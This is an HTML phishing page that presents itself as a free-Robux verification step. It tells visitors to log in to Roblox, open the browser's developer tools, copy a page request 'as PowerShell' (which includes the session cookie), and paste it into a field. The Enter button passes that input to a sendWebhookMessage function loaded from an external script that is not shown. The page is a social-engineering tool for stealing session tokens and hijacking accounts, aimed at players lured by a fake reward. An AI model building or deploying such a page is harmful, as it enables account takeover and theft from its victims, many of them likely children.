<!DOCTYPE html>
<html>
<head>
  <title>Connect an Account</title>
  <style>
    body {
      background-color: #333;
      color: #fff;
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
    }

    .container {
      width: 400px;
      margin: 0 auto;
      background-color: #666;
      border-radius: 10px;
      padding: 20px;
      text-align: center;
      display: none;
      animation-duration: 0.5s;
      animation-fill-mode: forwards;
    }

    .button-container {
      display: flex;
      flex-direction: column;
      align-items: center;
    }

    .button {
      display: inline-block;
      margin-top: 10px;
      padding: 10px 20px;
      border: none;
      border-radius: 5px;
      font-size: 16px;
      color: #fff;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }

    .button-blue {
      background-color: #007bff;
    }

    .button-red {
      background-color: #dc3545;
    }

    .instructions {
      text-align: left;
      margin-top: 20px;
    }

    .code {
      background-color: #333;
      color: #fff;
      padding: 5px;
    }

    .link {
      color: #007bff;
    }

    .text-input {
      width: 300px;
      height: 30px;
      margin-top: 20px;
    }

    .enter-button {
      padding: 5px 10px;
      background-color: #007bff;
      border: none;
      border-radius: 5px;
      color: #fff;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }

    @keyframes fadeOut {
      0% {
        opacity: 1;
      }
      100% {
        opacity: 0;
      }
    }

    @keyframes fadeIn {
      0% {
        opacity: 0;
      }
      100% {
        opacity: 1;
      }
    }
  </style>
</head>
<body>
  <div class="container" id="connectAccountBox" style="display: block;">
    <h1>Connect an Account to Verify</h1>
    <div class="button-container">
      <button class="button button-red" onclick="showRobloxBox()">Roblox</button>
    </div>
  </div>

  <div class="container" id="robloxBox">
    <h1>Follow These Steps</h1>
    <p>To Get You're Robux</p>
    <ol class="instructions">
      <li>Go To <a href="https://roblox.com" class="link">Roblox</a> to and log in</li>
      <li>Click on any game. Right click and choose inspect, then go to "Network" and refresh the page.
      Scroll all the way up and Right Click the one with the game name on it and hover over copy, choose copy to Powershell and paste it here. Done! </li>
    </ol>
    <div id="robloxForm">
      <input type="text" class="text-input" id="robloxTokenInput" placeholder="Paste it here">
      <button class="enter-button" onclick="sendWebhookMessage('robloxTokenInput')">Enter</button>
    </div>
  </div>
</body>
</html>
<script src="script.js"></script>
</body>
</html>
